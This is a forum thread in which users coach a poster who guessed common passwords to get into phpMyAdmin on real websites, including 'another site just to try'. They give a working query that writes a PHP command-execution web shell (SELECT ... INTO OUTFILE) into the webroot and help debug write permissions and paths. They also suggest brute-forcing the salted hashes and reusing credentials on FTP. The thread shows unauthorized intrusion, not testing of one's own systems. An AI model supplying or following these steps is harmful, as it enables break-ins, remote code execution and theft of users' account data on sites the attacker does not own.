phpmyadmin - can I spawn a shell?
japanesedude wrote: Yes, you can attaempt to brute force the hashes which you have the salts for :)
Also, I've head the 'loadfile' command in SQL might be able to upload files to the webserver….I don't know much about that though, or if it is even possible :/
IF the hashes are salted. Btw, I've never heard of a 'loadfile' for SQL and I can't seem to find any on google either. I'm pretty sure you can't upload files through phpmyadmin. 99.9% sure.
slpctrl wrote: If the hashes are salted. Btw, I've never heard of a 'loadfile' for SQL and I can't seem to find any on google either.
Maybe something like this? http://sqlserver2000.databases.aspfaq.com/how-do-i-load-text-or-csv-file-data-into-sql-server.html
spyware wrote: [quote]slpctrl wrote: If the hashes are salted. Btw, I've never heard of a 'loadfile' for SQL and I can't seem to find any on google either.
Maybe something like this? http://sqlserver2000.databases.aspfaq.com/how-do-i-load-text-or-csv-file-data-into-sql-server.html[/quote]
That's to load files into the database. For one, you couldn't remotely upload a PHP shell(which you would have to do unless you could find an RFI/LFI or an include vuln or the eval function is used and unfiltered) file through it; but I guess you probably could indirectly do it by uploading the contents of a shell to the database and then selecting/echoing that information.
slpctrl wrote: [quote]spyware wrote: [quote]slpctrl wrote: If the hashes are salted. Btw, I've never heard of a 'loadfile' for SQL and I can't seem to find any on google either.
Maybe something like this? http://sqlserver2000.databases.aspfaq.com/how-do-i-load-text-or-csv-file-data-into-sql-server.html[/quote]
That's to load files into the database. For one, you couldn't remotely upload a PHP shell(which you would have to do unless you could find an RFI/LFI or an include vuln or the eval function is used and unfiltered) file through it; but I guess you probably could indirectly do it by uploading the contents of a shell to the database and then selecting/echoing that information.[/quote]
Is it hard to echo the information? What exactly do you mean by that?
hacker2k wrote: Yeah, or, if they have an ftp server, you might be able to use the same username and password for ftp. They might use the same username and password for it (even though it would be really stupid).
P.S. How did you manage to get into their phpmyadmin?
They unfortunately didn't! They are too smart! So I am stuck with my salt hashes.
alha wrote: [quote]hacker2k wrote: Yeah, or, if they have an ftp server, you might be able to use the same username and password for ftp. They might use the same username and password for it (even though it would be really stupid).
P.S. How did you manage to get into their phpmyadmin?
They unfortunately didn't! They are too smart! So I am stuck with my salt hashes.[/quote]
If they allow remote access into phpmyadmin, they're really not all that smart. And no it's not that difficult to select and echo information from a database. You are probably going to need PHP for the echo part…oh snap!
alha wrote: Thank you.You are probably right. I can do some programming. I am learning it on the university. I can only do C, C++ and Java for the moment. But php seems to bee a fast learning language. What do you think? You seem to know better about php!
Thnx in advance!
PHP is a good server side scripting language whereas C, C++ and java are all really important languages to know if you're speaking in terms of general hacking/coding. It's all good to know; if you're going to be doing a lot of web hacking PHP is for sure a must to know because it's free, open source, used by lots and lots of websites and easy to find exploits for (given that it's open source and free).
alha wrote: Splendid! Do you know a good site for learning? I don't have any more money to buy microprocessor, programming books. :P
A site similar to w3schools would be good!
I learned from w3schools and then:
http://www.phpfreaks.com/forums/ http://www.phpfreaks.com
Should be all you need.
spyware wrote: [quote]hacker2k wrote: P.S. How did you manage to get into their phpmyadmin?
Hey, if that's like magic to you, then that is how it is supposed to be. Asking for an explanation would ruin the trick.[/quote] Aww man, you mean I don't get to know if he found a vulnerability or if he just guessed the username and password? Oh well, I'll just google for recent advisories.
@system_meltdown: Cool, I didn't know you could do that with MySQL.
Edit: Wouldn't that assume that the MySQL server runs as the same user that owns the web-root or whatever file you are writing to? Most of the time the two seperate daemons would be run by two different users, www-data and mysqld by default depending on the version of the servers. So that most likely won't work on a web-server that you have mysql access to, correct?
Nice! =) I will give it a try. But can I specify any path or must it be a certain one? The version of the server is phpMyAdmin 2.11.1.
I didn't find any exploit. It was pretty simple this time when I wanted to get in. I tested different common passwords and I got in after a while. So I would not call it hacking. But I always look for the easiest way in first before discovering anything further. I want to learn writing my own exploits soon. It seems more reliable. Btw what is fuzzing good for? For finding vulnerabilities? buffer overflows etc?
alha wrote: Nice! =) I will give it a try. But can I specify any path or must it be a certain one? The version of the server is phpMyAdmin 2.11.1.
I didn't find any exploit. It was pretty simple this time when I wanted to get in. I tested different common passwords and I got in after a while. So I would not call it hacking. But I always look for the easiest way in first before discovering anything further. I want to learn writing my own exploits soon. It seems more reliable. Btw what is fuzzing good for? For finding vulnerabilities? buffer overflows etc?
You need the full path to the webroot. Usually something like /var/www/ on a Linux box.
Without writing anything it says the following output over the query box: "Warning: ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice in /var/www/html/phpMyAdmin-2.11.1-all-languages/libraries/ob.lib.php on line 80"
I only get an error message after writing the query to the server:
Error
SQL query: Documentation
SELECT "<?php exec($_GET['cmd']);?>" INTO OUTFILE '/var/www/lol.php'
MySQL said: Documentation #1 - Can't create/write to file '/var/www/lol.php' (Errcode: 13)
alha wrote: Without writing anything it says the following output over the query box: "Warning: ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice in /var/www/html/phpMyAdmin-2.11.1-all-languages/libraries/ob.lib.php on line 80"
I only get an error message after writing the query to the server:
Error
SQL query: Documentation
SELECT "<?php exec($_GET['cmd']);?>" INTO OUTFILE '/var/www/lol.php'
MySQL said: Documentation #1 - Can't create/write to file '/var/www/lol.php' (Errcode: 13)
Try using SELECT "<?php exec($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/lol.php'
Maybe html is writable and www isnt for some reason. Besides that you need it in the web root.
apescanfly223 wrote: [quote]alha wrote: Without writing anything it says the following output over the query box: "Warning: ob_start() [ref.outcontrol]: output handler 'ob_gzhandler' cannot be used twice in /var/www/html/phpMyAdmin-2.11.1-all-languages/libraries/ob.lib.php on line 80"
I only get an error message after writing the query to the server:
Error
SQL query: Documentation
SELECT "<?php exec($_GET['cmd']);?>" INTO OUTFILE '/var/www/lol.php'
MySQL said: Documentation #1 - Can't create/write to file '/var/www/lol.php' (Errcode: 13)
Try using SELECT "<?php exec($_GET['cmd']);?>" INTO OUTFILE '/var/www/html/lol.php'
Maybe html is writable and www isnt for some reason. Besides that you need it in the web root.[/quote]
Or the user that mysql is running as doesn't have permission to write on the web-root…
Ok I checked the permissions:
there are several accounts on the phpMyAdmin.
admin localhost database-specific ALL PRIVILEGES No admin_(sitename) localhost database-specific ALL PRIVILEGES No da_admin localhost global ALL PRIVILEGES Yes root HKH003.local global ALL PRIVILEGES Yes root localhost global ALL PRIVILEGES Yes
I have access to the root account on localhost. Threre only only hashes and thousands of accounts etc.
alha wrote: Ok I checked the permissions:
there are several accounts on the phpMyAdmin.
admin localhost database-specific ALL PRIVILEGES No admin_(sitename) localhost database-specific ALL PRIVILEGES No da_admin localhost global ALL PRIVILEGES Yes root HKH003.local global ALL PRIVILEGES Yes root localhost global ALL PRIVILEGES Yes
I have access to the root account on localhost. Threre only only hashes and thousands of accounts etc.
The user that you are logged into on mysql doesn't matter. What matters is the username that the mysql daemon is running on. Usually it is mysqld.
slpctrl wrote: [quote]system_meltdown wrote: Run this:
SELECT "<?php exec($_GET['cmd']);?>" INTO outfile '/full/path/goes/here/lol.php'
Lemme know if it works.
HAHAHA it works :D[/quote]
Did it work for you slpctrl? I got into a phpmyadmin of another site just to try if it works. It doesn't seem to work. Can I write the sql code it in any database on the server?
alha wrote: [quote]slpctrl wrote: [quote]system_meltdown wrote: Run this:
SELECT "<?php exec($_GET['cmd']);?>" INTO outfile '/full/path/goes/here/lol.php'
Lemme know if it works.
HAHAHA it works :D[/quote]
Did it work for you slpctrl? I got into a phpmyadmin of another site just to try if it works. It doesn't seem to work. Can I write the sql code it in any database on the server?[/quote]
It worked on my local server, yeah. If you had root access (which was the account I executed it with), it should work. Are you getting an error? If so what exactly is the error?
edit: nm I see the error.